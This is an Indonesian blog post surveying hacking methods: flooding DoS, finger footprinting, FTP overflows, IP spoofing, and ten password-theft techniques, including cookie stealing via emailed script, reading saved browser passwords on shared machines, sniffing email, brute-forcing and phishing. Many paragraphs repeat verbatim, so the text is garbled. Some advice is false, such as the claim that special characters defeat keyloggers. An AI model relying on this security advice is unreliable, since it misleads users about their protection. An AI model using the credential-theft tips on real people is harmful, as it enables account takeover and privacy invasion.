Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang hacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.
Unix Finger Exploits Hack
Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang hacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact.
Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha kracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.
FTP Attack Hack
Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau hacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang hacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang hacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang.
Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce attack (menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff informasi yang berada dalam sistem.
IP Spoofing Hack
IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP hacker sehingga sasaran menganggap alamat IP hacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan hacker mempunyai IP address type A 66.25.xx.xx ketika hacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP hacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C.
IP Spoofing terjadi ketika seorang hacker ‘mengakali’ packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat hacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh hacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para hacker.
Berbagai Macam Cara Hacker Membobol Password
Ada
banyak cara untuk mendapatkan suatu password / membajak password /
crack password. Beberapa diantaranya tidak membutuhkan keahlian khusus.
Berikut adalah cara-cara yang paling umum dan paling sering digunakan :
[1]. Social Engineering
[2]. KeyLogger
[3]. Web Spoofing
[4]. Menghadang Email
[5]. Password Cracking
[6]. Session Hijacking
[7]. Menjadi Proxy Server
[8]. Memanfaatkan Kelalaian User Dalam Penggunaan FiturBrowser
[9]. Googling
[10]. Phising
[2]. KeyLogger
[3]. Web Spoofing
[4]. Menghadang Email
[5]. Password Cracking
[6]. Session Hijacking
[7]. Menjadi Proxy Server
[8]. Memanfaatkan Kelalaian User Dalam Penggunaan FiturBrowser
[9]. Googling
[10]. Phising
[1]. Social Engineering
Social
Engineering adalah nama suatu tehnik pengumpulan informasi dengan
memanfaatkan celah psikologi korban. Atau mungkin boleh juga dikatakan
sebagai ‘penipuan’ Sosial Engineering membutuhkan kesabaran dan
kehati-hatian agar sang korban tidak curiga. Kita dituntut untuk kreatif
dan mampu berpikiran seperti sang korban.
Social
Engineering merupakan seni ‘memaksa’ orang lain untuk melakukan sesuatu
sesuai dengan harapan atau keinginan anda. Tentu saja ‘pemaksaan’ yang
dilakukan tidak secara terang-terangan atau diluar tingkah laku normal
yang biasa dilakukan sang korban. Manusia cenderung untuk percaya atau
mudah terpengaruh terhadap orang yang memiliki nama besar, pernah (atau
sedang berusaha) memberikan pertolongan, dan memiliki kata-kata atau
penampilan yang meyakinkan. Hal ini sering dimanfaatkan pelaku social
engineering untuk menjerat korbannya. Seringkali sang pelaku membuat
suatu kondisi agar kita memiliki semacam ketergantungan kepadanya.Ya,
tanpa kita sadari dia mengkondisikan kita dalam suatu masalah dan
membuat ( seolah – olah hanya ) dialah yang bisa mengatasi masalah itu.
Dengan demikian,tentu kita akan cenderung untuk menuruti apa yang dia
instruksikan tanpa merasa curiga.
Sosial
Engineering adakalanya menjadi ancaman serius. Memang sepertinya tidak
ada kaitan dengan teknologi, namun sosial engineering tetap layak
diwaspadai karena bisa berakibat fatal bagi sistem anda. Why?? Karena
bagaimanapun juga suatu komputer tetap saja tidak bisa lepas dari
manusia. Ya, tidak ada satu sistem komputerpun di muka bumi ini yang
bisa lepas dari campur tangan manusia. sehebat apapun pertahanan anda,
jika anda sudah dikuasai oleh attacker melalui social engineering, maka
bisa jadi anda sendirilah yang membukakan jalan masuk bagi sang
attacker.
[2]. KeyLogger
KeyLogger
adalah software yang dapat merekam aktivitas user. Hasil rekaman itu
biasa disimpan berupa teks atau gambar. KeyLogger bekerja berdasarkan
ketukan keyboard user. Aplikasi ini mampu mengenali form-form sensitif
seperti form password misalnya.
Ada cara aman untuk menghindari keyloger:
1. Gunakan password dengan karakter special seperti !@#$%^&*(){}[]. Kebanyakan keyloger akan mengabaikan karakter ini sehingga sang pelaku (pemasang keyloger) tidak akan mendapatkan password anda yang sebenarnya.
1. Gunakan password dengan karakter special seperti !@#$%^&*(){}[]. Kebanyakan keyloger akan mengabaikan karakter ini sehingga sang pelaku (pemasang keyloger) tidak akan mendapatkan password anda yang sebenarnya.
2.
Persiapkan password dari rumah, simpan dalam bentuk teks. Saat ingin
memasukkan password, tingal copy-paste ajah. Keyloger akan membaca
password anda berdasarkan ketukan keyboard. Namun cara ini agak
beresiko. Mengapa? karena saat anda melakukan copy, data anda akan
tersimpan di clipboard. Saat ini banyak dijumpai software-software
gratis yang bisa menampilkan data dalam clipboard.
[3]. Web Spoofing
Masih
ingat kasus pecurian Account sejumlah nasabah Bank BCA? Ya, itulah
salah satu contoh nyata dari Web spoofing. Inti dari tehnik ini ialah
dengan memanfaatkan kesalahan user saat mengetikkan alamat situs pada
address bar. Pada dasarnya, Web Spoofing adalah usaha untuk menipu
korban agar mengira dia sedang mengakses suatu situs tertentu, padahal
bukan.
Pada
kasus bank BCA, pelaku membuat situs yang sangat mirip dan identik
dengan situs aslinya sehingga sang korban yang terkecoh tidak akan
merasa ragu mengisikan informasi sensitif seperti user name dan
Passwordnya. Padahal, karena situs tersebut adalah situs tipuan, maka
semua informasi berharga tadi terekam oleh webserver palsu, yaitu milik
sang pelaku.
[4]. Menghadang Email
Menghadang
email? Ya, dan sangat mudah untuk melakukan hal ini. Salah satu cara
adalah dengan menggunakan mailsnarf yang terdapat pada utility dsniff.
Cara kerja Mailsnarf adalah dengan menghadang paket data yang lewat di
Internet dan menyusunnya menjadi suatu email utuh.
Dsniff
dan mailsnift merupakan software bekerja atas dasar WinPcap (setara
dengan libcap pada Linux) yaitu suatu library yang menangkap paket-paket
data. Paket-paket yang ditangkap ini akan disimpan dalam bentuk file
oleh Windump, sedangkan Dsniff dan MailSnarf bertindak lebih jauh lagi
yaitu menganalisa paket-paket data ini dan menampilkan password (dsniff)
atau isi email (mailsnarf).
[5]. Password Cracking
‘Hacking
while sleeping.’ itulah ungkapan yang biasa dipakai oleh orang-orang
yang melakukan password cracking. Mengapa? Karena pada umumnya dibuthkan
waktu yang lama untuk melakukan pasword cracking. Bisa berjam-jam,
bahkan berhari – hari! Semua itu tergantung dari target, apakah sang
target menggunakan password yang umum, password memiliki panjang
karakter yang tidak biasa, atau password memiliki kombinasi dengan
karakter-karakter special.
Salah
satu software yang biasa digunakan untuk melakukan hal ini ialah dengan
mengunakan Brutus, salah satu jenis software remote password cracker
yang cukup terkenal. Brutus bekerja dengan teknik dictionary attack atau
bruce-force attack terhadap port-port http, POP3,ftp, telnet, dan
NetBIOS.
Dictionary
Attack bekerja dengan mencobakan kata-kata yang ada dalam kamus
password. Sedangkan brute – force attack bekerja dengan mencobakan semua
kombinasi huruf, angka, atau karakter.
Brute
Force Atack bekerja sangat lambat dan membutuhkan waktu yang lama
tergantung dari jenis spesifikasi komputernya dan panjang karakter
passwordnya. Saat ini telah banyak situs yang menutup akses terhadap
akses terhadap usaha login yang secara terus-menerus tidak berhasil.
[6]. Session Hjacking
Session
hijacking dewasa ini semakin marak dikalangan para attacker. Session
Hijacking biasa dilakukan dengan melakukan peniruan cookies. Jadi pada
intinya, kita harus bisa meniru cookies sang korban untuk mendapatkan
sesi loginnya.
Lalu bagaimana cara mendapatkan cookies sang korban?
1. Dengan analisa Cookies.
Cara ini relatif sulit dilakukan.
2. Mencuri Cokies.
Misalnya Sang Attacker ingin mendapatkan account si A. Sang Attacker bisa dengan mudah membuat semacam script Java Script yang disisipkan dalam email untuk dikirim ke korban.Saat korban membuka email itu, tanpa sadar cookiesnya akan dicuri dan direkam ke suatu webserver dengan memanfaatkan suatu script PHP.
Cara ini relatif sulit dilakukan.
2. Mencuri Cokies.
Misalnya Sang Attacker ingin mendapatkan account si A. Sang Attacker bisa dengan mudah membuat semacam script Java Script yang disisipkan dalam email untuk dikirim ke korban.Saat korban membuka email itu, tanpa sadar cookiesnya akan dicuri dan direkam ke suatu webserver dengan memanfaatkan suatu script PHP.
Belakangan
ini yang paling sering menjadi incaran adalah account Friendster. Ada
yang menyisipkan suatu scipt lewat testimonial, ada yang menyisipkannya
di profilnya sendiri untuk mencuri cookies sang korban dan lain
sebagainya. Saya memiliki tips untuk ini:
1. Jangan menggunakan browser Internet Explorer
Saat ingin membuka profil orang lain, jangan menggunakan Internet Explorer. Catat alamat profil yang ingi anda lihat,logout terlebih dahulu dari account anda dan bersihkan semua cookies, baru kemudian bukalah profil Friendster tujuan.
Saat ingin membuka profil orang lain, jangan menggunakan Internet Explorer. Catat alamat profil yang ingi anda lihat,logout terlebih dahulu dari account anda dan bersihkan semua cookies, baru kemudian bukalah profil Friendster tujuan.
2. Periksa Source CODEnya
Ketika menerima testimonial, periksa terlebih dahulu source codenya. Apakah disana terdapat script asing atau kata-kata yang identik dengan pembajakan seperti :
Ketika menerima testimonial, periksa terlebih dahulu source codenya. Apakah disana terdapat script asing atau kata-kata yang identik dengan pembajakan seperti :
‘HACKED’, ‘DEFACED’, ‘OWNED’.. dll..
Jika ragu-ragu……. reject ajah..
Jika ragu-ragu……. reject ajah..
3. LogOUT tiba-tiba.
Waspada ketika tanpa suatu alasan yang jelas tiba-tiba anda logout dengan sendirinya dari account anda. Saat anda diminta memasukkan username dan password, lihat dulu addressbar anda! apakan anda sedang berada di situs yang semestinya atau tidak. Periksa source code halaman tersebut.Lihat pada form action, kemana informasi anda nantinya akan dikirim.
Waspada ketika tanpa suatu alasan yang jelas tiba-tiba anda logout dengan sendirinya dari account anda. Saat anda diminta memasukkan username dan password, lihat dulu addressbar anda! apakan anda sedang berada di situs yang semestinya atau tidak. Periksa source code halaman tersebut.Lihat pada form action, kemana informasi anda nantinya akan dikirim.
Sebenarnya session hijacking bisa dicegah jika saja sang penyedia layanan memperhatikan hal-hal berikut:
1. Menetapkan session identifier yang unik
2. Menetapkan sistem identifier berpola acak
3. Session identifier yang independen
4. Session identifier yang bisa dipetakan dengan koneksi
client side.
Fenomena lain adalah, hingga saat artikel ini diterbitkan, ternyata masih banyak dijumpai para user yang tidak melakukan sign out setelah membuka accountnya. Dengan demikian, orang lain yang mengunakan komputer itu dan membuka website yang sama dengan yang telah dibuka oleh orang pertama akan otomatis login ke account sang korban.
1. Menetapkan session identifier yang unik
2. Menetapkan sistem identifier berpola acak
3. Session identifier yang independen
4. Session identifier yang bisa dipetakan dengan koneksi
client side.
Fenomena lain adalah, hingga saat artikel ini diterbitkan, ternyata masih banyak dijumpai para user yang tidak melakukan sign out setelah membuka accountnya. Dengan demikian, orang lain yang mengunakan komputer itu dan membuka website yang sama dengan yang telah dibuka oleh orang pertama akan otomatis login ke account sang korban.
[7]. Menjadi Proxy Server
Kita
bisa mengumpulkan informasi dengan menjadi proxy server bagi korban
untuk dapat berselancar. Dengan menjadi proxy server, seluruh identitas
sang peselancar bisa menjadi milik kita.
[8]. Memanfaatkan Kelalaian user dalam penggunaan fiturbrowser

Setiap browser tentunya memiliki fitur yang ditujukan untuk kemudahan dan kenyamanan penggunanya dalam berselancar. Diantaranya ialah dengan adanya cache dan Password Manager.
Setiap browser tentunya memiliki fitur yang ditujukan untuk kemudahan dan kenyamanan penggunanya dalam berselancar. Diantaranya ialah dengan adanya cache dan Password Manager.
Di
Internet tentunya banyak suatu website yang isinya tidak berubah dalam
beberapa hari (Contohnya spyrozone.tk nich.. hehehe Nah, untuk situs
yang seperti ini cache menjadi hal yang sangat berguna. Cache akan
menyimpan file-file hasil browsing sehinga nantinya jika anda berkunjung
lagi ke situs tersebut browser tidak perlu lagi melakukan download
untuk kedua kalinya dari server sehingga setiap halaman situs yang telah
anda buka sebelumnya akan terbuka dengan lebih cepat. Semua itu
biasanya diatur oleh header time to live.
Lho,
bagaimana dengan situs-situs penyedia berita yang selalu up to date?
Untuk site yang seperti itu, time to live-nya akan di set=0 sehinga
nantinya anda akan terus melakukan download setiap kali berkunjung.
Cukup
nyaman bukan? Ya, tapi ancaman mulai timbul. Cobalah kini anda jelajahi
opsi-opsi yang berkaitan dengan cache pada browser anda. Tentu anda
bisa menemui bahwa ada fasilitas untuk menentukan berapa besarnya file
temporary yang bisa disimpan di harddisk. Cari juga lokasi dimana
file-file tersebut akan disimpan.
Coba
anda buka folder tersebut, anda akan menemui file-file html &
file-file gambar dari site-site yang sudah anda kunjungi. Pada Browser
IE, anda bisa melihat lokasi file cache dengan menjelajahi menu Tools —
Internet options — Settings
Lalu
apa yang bisa didapatkan?? toh cuma file-file ‘sampah’?? Hmm… sekarang
coba anda copy semua file yang ada di sana ke suatu folder. Lalu bukalah
salah-satu file htmlnya. Jika itu komputer publik,anda bisa mengetahui
situs apa saja yang telah diakses oleh oleh orang sebelum anda.
Hmm..
hanya dengan melihat file temporary anda bahkan bisa melihat password
dan dll. Banyak saya temui situs yang menyimpan password dan
menampilkannya pada url. Tentunya anda juga pasti sering membacanya di
berbagai tutorial.
Kebanyakan
browser pada saat ini memiliki fasilitas untuk menyimpan password.
Misalnya saat meggunakan Mozilla Firefox, anda pasti sering menerima
kotak dialog konfirmasi yang menanyakan apakah anda ingin password anda
disimpan atau tidak oleh PasswordManager. Kebanyakan user cenderung
untuk memilih opsi YES, entah itu dengan penuh kesadaran atau memang
mereka tidak tau ( baca: tidak mau tau) apa maksud dari kotak dialog
itu.
Orang
lain yang kemudian mengunakan browser itu bisa dengan sangat mudah
mendapatkan password korban dengan memasuki menu Tools — Options —
Security – Saved password.
Contoh
lain adalah fasilitas wand password yang dimiliki oleh browser Opera.
Saat anda memasukkan user name dan password pada suatu form dan menekan
tombol submit, opera secara default akan meminta konfirmasi kepada anda
apakah anda ingin browser menyimpan id dan password anda atau tidak.
Lagi dan lagi… kebanyakan netter ceroboh, mereka cenderung untuk memilih
opsi ‘YES’.
Lalu??
Orang lain yang kemudian menggunakan browser itu bisa melihat situs apa
saja yang telah diakses oleh user, arahkan browser ke situs tersebut,
letakkan cursor pada form isian user name, tekan [ALT]+[ENTER] dan
BOOOMM!!!! Kenapa?? Jangan kaget dulu!! Hehehe.. form login akan
otomatis terisi dengan user name korban lengkap dengan passwordnya (It’s
fun enough..
Ini hanya sebagian kecil contoh, jelajahi fitur-firtur browser lain!
[9]. Googling

Google.com.
Banyak sudah situs yang runtuh, password dan nomor – nomor kartu kredit
yang dicuri akibat dari ulah orang yang menyalahgunaan kesaktiannya
Dahulu, hal ini mudah dilakukan.Hanya dengan mengetikkan kata kunci
tertentu yang berkaitan dengan user name dan password, anda bisa memanen
ratusan password user melalui google. Tapi sekarang tampaknya anda
harus gigit jari jika menggunakan cara diatas
Jangan
sedih dulu karena Google baru saja menelurkan produk barunya, yaitu
Google Code Search. Ancaman baru mulai timbul, ‘si pintar’ ini kini
dapat meng-crawl hingga kepada archive file yang berada di public
directory web server. Hati-hati yang punya kebiasaan untuk menyimpan
informasi penting di dalamnya (password, dan info berharga lainnya)
Sebaiknya mulai sekarang kebiasaan itu dihilangkan. Selalu proteksi
folder-folder yang sensitif agar situs anda bisa hidup lebih lama. Kalo
nggak… yach.. tunggu ajah ada orang yang memanfaatkan produk baru google
ini untuk mengeruk informasi sensitif dari web server anda. dan jika
itu sudah terjadi… maka bersiaplah.. ‘taman bermain’ anda akan diambil
alih olehnya..
[10] Phising
Phising ,
adalah tindakan memperoleh informasi pribadi seperti User ID, PIN,
nomor rekening, nomor kartu kredit Anda secara tidak sah. Informasi ini
kemudian akan dimanfaatkan oleh pihak penipu untuk mengakses rekening,
melakukan penipuan kartu kredit atau memandu nasabah untuk melakukan
transfer ke rekening tertentu dengan iming-iming hadiah
Aksi ini semakin marak terjadi. Tercatat secara global, jumlah penipuan bermodus phising selama
Januari 2005 melonjak 42% dari bulan sebelumnya. Anti-Phishing Working
Group (APWG) dalam laporan bulanannya, mencatat ada 12.845 e-mail baru dan unik serta 2.560 situs palsu yang digunakan sebagai sarana phishing.
Selain
terjadi peningkatan kuantitas, kualitas serangan pun juga mengalami
kenaikan. Artinya, situs-situs palsu itu ditempatkan pada server yang
tidak menggunakan protokol standar sehingga terhindar dari pendeteksian
Bagaimana phishing dilakukan?
Teknik umum yang sering digunakan oleh penipu adalah sebagai berikut:
- Penggunaan alamat e-mail palsu dan grafik untuk menyesatkan Nasabah sehingga Nasabah terpancing menerima keabsahan e-mail atau web sites. Agar tampak meyakinkan, pelaku juga seringkali memanfaatkan logo atau merk dagang milik lembaga resmi, seperti; bank atau penerbit kartu kredit. Pemalsuan ini dilakukan untuk memancing korban menyerahkan data pribadi, seperti; password, PIN dan nomor kartu kredit
- Membuat situs palsu yang sama persis dengan situs resmi.atau . pelaku phishing mengirimkan e-mailyang berisikan link ke situs palsu tersebut.
- Membuat hyperlink ke web-site palsu atau menyediakan form isian yang ditempelkan pada e-mail yang dikirim.
Kata Sambuttan
banyak tips yang anda ketahui di www.aghilmyblog.blogspot.com
silahkan anda melihatnya
jika dha kekurangan silahkan kalian coment di blog saya....
terima kasih
www.aghilmyblog.blogspot.com
silahkan anda melihatnya
jika dha kekurangan silahkan kalian coment di blog saya....
terima kasih
www.aghilmyblog.blogspot.com
Subscribe to:
Posts (Atom)
-
17 Tips Meng"Hack" Tubuhmu 1. Jika tenggorokanmu gatal, garuk telingamu “Jika saraf dekat telinga distimulasi, b...
-
Cheat Point Blank All Cheat 26 Oktober 2013 Fix Hari Ini saya akan shared tentang Cheat Point Blank All Cheat 26 Oktober 2013...
-
Cara Buat Email Pake Domain hackermail.com Mungkin kita sudah sering mendengar domain email seperti @yahoo.com @gmail.com...















